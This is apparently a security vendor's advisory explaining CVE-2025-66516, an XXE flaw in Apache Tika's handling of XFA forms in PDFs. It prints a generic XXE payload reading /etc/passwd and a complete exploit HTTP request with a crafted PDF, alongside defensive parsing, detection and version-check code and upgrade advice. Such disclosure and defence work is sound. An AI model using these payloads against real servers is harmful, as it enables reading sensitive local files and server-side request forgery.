Apache Tika XXE Vulnerability CVE-2025-66516 Explained

Picus Labs | 6 MIN READ

CREATED ON January 09, 2026

A high-severity security flaw has been identified in Apache Tika, the open-source framework widely utilized for document parsing and metadata extraction. Tracked as CVE-2025-66516 with a CVSS score of 8.4, this vulnerability enables XML External Entity (XXE) attacks via malicious XFA files embedded within PDFs. 

This disclosure supersedes the previously reported CVE-2025-54988; investigation revealed that the root cause resides within the tika-core library rather than the PDF module alone, effectively expanding the scope of affected packages. Because the vulnerability exists in the core logic, upgrading only the PDF parser module is insufficient to resolve the issue.

Systems processing untrusted files are susceptible to significant risks, including the exfiltration of sensitive local files, server-side request forgery (SSRF), and denial of service (DoS). To remediate this threat, it is essential to upgrade tika-core to version 3.2.2 or later, as earlier versions (1.13 through 3.2.1) remain vulnerable to exploitation.

What Is Apache Tika?

Apache Tika is an open-source framework designed to detect and extract metadata and text from a vast array of file formats. It is capable of processing over a thousand different file types, including common formats like PowerPoint (PPT), Excel (XLS), and Portable Document Format (PDF). Because of its versatility, Tika has become a fundamental component in document processing workflows, content analysis systems, and search indexing engines across various sectors, including finance, media, legal, and government.

What Is the XXE (XML External Entity) Injection Attack?

An XML External Entity (XXE) attack targets applications that parse XML input. The vulnerability arises when a weakly configured XML parser processes input containing a reference to an external entity. The XML 1.0 standard defines "entities" as storage units; an external entity is one whose content is stored outside the document. External entities are accessed via a declared system identifier, typically a URI, which the processor attempts to dereference.

If an attacker includes tainted data in the system identifier and the XML processor dereferences it, the system may disclose confidential information that the application should not expose. Beyond data disclosure, successful XXE attacks can lead to Denial of Service (DoS), Server-Side Request Forgery (SSRF), and port scanning from the perspective of the server. In scenarios where the parser has client-side memory corruption flaws, dereferencing a malicious URI could even result in arbitrary code execution.

Below is a simple XXE payload that discloses the /etc/passwd file of the target server [1]:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
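
A common defense against payloads like the one above is to refuse any XML that carries a DOCTYPE declaration. The following is a minimal sketch of that idea using Python's standard expat bindings. It is not how Tika implements its fix, and the names parse_without_dtd, is_rejected, and DtdForbidden are hypothetical helpers introduced only for illustration.

```python
import xml.parsers.expat


class DtdForbidden(ValueError):
    """Hypothetical error type: untrusted XML contained a DOCTYPE."""


def parse_without_dtd(xml_bytes: bytes) -> None:
    """Parse XML, aborting as soon as a DOCTYPE declaration is seen."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Entities are declared inside the DTD, so rejecting every
        # DOCTYPE stops external entities before they are declared.
        raise DtdForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


def is_rejected(xml_bytes: bytes) -> bool:
    """Return True when the document is refused because of a DOCTYPE."""
    try:
        parse_without_dtd(xml_bytes)
    except DtdForbidden:
        return True
    return False


# The example payload shown above, as bytes.
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""
```

With this sketch, is_rejected(PAYLOAD) reports the payload as refused, while a plain document such as b"<foo>ok</foo>" parses normally. Malformed XML still raises expat's own ExpatError, which a caller would need to handle separately.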

How Does the CVE-2025-66516 Exploit Work?

CVE-2025-66516 is a high-severity vulnerability that has been identified in Apache Tika. This flaw carries a CVSS score of 8.4 and enables attackers to execute XML External Entity (XXE) attacks by embedding a maliciously crafted XFA file inside a PDF [2]. If processed by a vulnerable version of Tika, this can lead to unauthorized information disclosure or denial of service.

Below is a generic example of an XXE payload that exploits this vulnerability:

PUT /<Tika Endpoint> HTTP/1.1
Content-Type: application/pdf
Content-Length: 1410

%PDF-1.7
%âãÏÓ
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>
endobj
4 0 obj
<< /Length 0 >>
stream
endstream
endobj
5 0 obj
<< /Fields [] /XFA 6 0 R /NeedAppearances true >>
endobj
6 0 obj
<< /Length 758 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
  <!ENTITY xxe SYSTEM "file:///path/to/the/file">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
  <present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
  <subform name="form1" layout="tb">
    <pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
    <subform>
      <field name="data"><ui><textEdit/></ui><value><text>&xxe;</text></value></field>
    </subform>
  </subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>
endstream
endobj
xref
0 7
0000000000 65535 f
0000000015 00000 n
0000000080 00000 n
0000000137 00000 n
0000000224 00000 n
0000000272 00000 n
0000000337 00000 n
trailer
<< /Size 7 /Root 1 0 R >>
startxref
1146
%%EOF

After the attacker sends this request, the Apache Tika server receives the PDF and initiates the parsing process. It identifies the embedded XFA form data and passes the XML stream to the underlying parser.

Because the XML parser is not configured to reject external entities, it processes the malicious <!DOCTYPE> declaration and resolves the system entity &xxe;, reading the contents of the targeted local file (e.g., /etc/passwd) directly from the server's filesystem.

The sensitive file content is then substituted into the XML structure wherever the entity is referenced.
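
The flow described above suggests a simple pre-filter for uploads: flag PDFs that both reference an XFA form and contain an external entity declaration. The sketch below is a heuristic only, under the assumption that the XFA stream is stored uncompressed as in the example request. It will miss compressed streams (for example, FlateDecode) and obfuscated PDF names, so it is no substitute for upgrading. The function name looks_like_xfa_xxe is hypothetical.

```python
import re

# Matches an entity declaration that points at an external resource,
# e.g. <!ENTITY xxe SYSTEM "file:///..."> or a parameter entity
# such as <!ENTITY % ext SYSTEM "http://...">.
EXTERNAL_ENTITY = re.compile(
    rb"<!ENTITY\s+%?\s*[^\s>]+\s+(SYSTEM|PUBLIC)\b"
)


def looks_like_xfa_xxe(pdf_bytes: bytes) -> bool:
    """Heuristic check (hypothetical helper, not part of Tika).

    Returns True when the raw PDF bytes contain an /XFA key and an
    external entity declaration. Only uncompressed content is seen.
    """
    has_xfa = b"/XFA" in pdf_bytes
    has_external_entity = EXTERNAL_ENTITY.search(pdf_bytes) is not None
    return has_xfa and has_external_entity
```

A service could call looks_like_xfa_xxe on the request body before handing the file to Tika and quarantine anything that matches. Because of the limitations noted above, a negative result does not prove a file is safe.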

What Is the Remediation for CVE-2025-66516?

The following modules and version ranges are affected on all platforms [3]:

  • Apache Tika core (org.apache.tika:tika-core) 1.13 through 3.2.1
  • Apache Tika parsers (org.apache.tika:tika-parsers) 1.13 before 2.0.0
  • Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module) 2.0.0 through 3.2.1

To fully mitigate this issue, you must ensure that tika-core is also upgraded to version 3.2.2 or higher. Upgrading the tika-parser-pdf-module alone is insufficient.
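
To audit a dependency inventory against the ranges listed above, a small version check can help. The sketch below encodes only the three ranges stated in this section. The helper names parse_version and is_affected are hypothetical, and the parser deliberately ignores qualifiers such as "-BETA", which is a simplifying assumption.

```python
import re

# Affected ranges from the list above:
# artifact -> (first affected, upper bound, upper bound is inclusive)
AFFECTED = {
    "tika-core": ((1, 13, 0), (3, 2, 1), True),
    "tika-parsers": ((1, 13, 0), (2, 0, 0), False),
    "tika-parser-pdf-module": ((2, 0, 0), (3, 2, 1), True),
}


def parse_version(version: str) -> tuple:
    """Turn '3.2.1' or '1.13' into a 3-part tuple such as (1, 13, 0).

    Assumption: any qualifier after a hyphen is ignored.
    """
    numbers = [int(n) for n in re.findall(r"\d+", version.split("-")[0])][:3]
    return tuple(numbers + [0] * (3 - len(numbers)))


def is_affected(artifact: str, version: str) -> bool:
    """Return True if the artifact version falls in an affected range."""
    if artifact not in AFFECTED:
        return False
    low, high, inclusive = AFFECTED[artifact]
    parsed = parse_version(version)
    if inclusive:
        return low <= parsed <= high
    return low <= parsed < high
```

For example, is_affected("tika-core", "3.2.1") is True and is_affected("tika-core", "3.2.2") is False. Since the fix lives in tika-core, the tika-core result is the one that matters most when the PDF parser module has already been upgraded.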

How Does Picus Help Simulate Apache Tika CVE-2025-66516 Attacks?

We also strongly suggest simulating the Apache Tika CVE-2025-66516 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as regreSSHion, Citrix Bleed, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Apache Tika CVE-2025-66516 vulnerability exploitation attacks:

Threat ID    Threat Name                        Attack Module
74403        Apache Tika Web Attack Campaign    Web Application

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • CVE-2025-66516 is a high-severity vulnerability in the Apache Tika framework with a CVSS score of 8.4 that enables XML External Entity (XXE) attacks via malicious XFA files embedded within PDFs.
  • The root cause of this flaw resides within the tika-core library rather than the PDF module alone, meaning that upgrading only the PDF parser module is insufficient to resolve the issue.
  • Exploitation occurs when the XML parser processes a malicious <!DOCTYPE> declaration within an embedded XFA form, causing the system to resolve external entities and potentially disclose sensitive local files like /etc/passwd.
  • Successful attacks can lead to severe consequences for systems processing untrusted files, including the exfiltration of sensitive data, Server-Side Request Forgery (SSRF), and Denial of Service (DoS).
  • To fully remediate the threat, organizations must upgrade tika-core to version 3.2.2 or later, as versions 1.13 through 3.2.1 remain vulnerable on all platforms.
  • The Picus Security Validation Platform allows organizations to simulate Apache Tika CVE-2025-66516 attacks using Threat ID 74403 to validate security controls against this specific vulnerability.

References

[1] “XML External Entity (XXE) Processing.” Accessed: Jan. 07, 2026. [Online]. Available: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

[2] “CVE-2025-66516.” Accessed: Jan. 07, 2026. [Online]. Available: https://www.cve.org/CVERecord?id=CVE-2025-66516

[3] “CVE-2025-66516: Apache Tika core, Apache Tika parsers, Apache Tika PDF parser module: Update to CVE-2025-54988 to expand scope of artifacts affected.” Accessed: Jan. 07, 2026. [Online]. Available: https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k

 
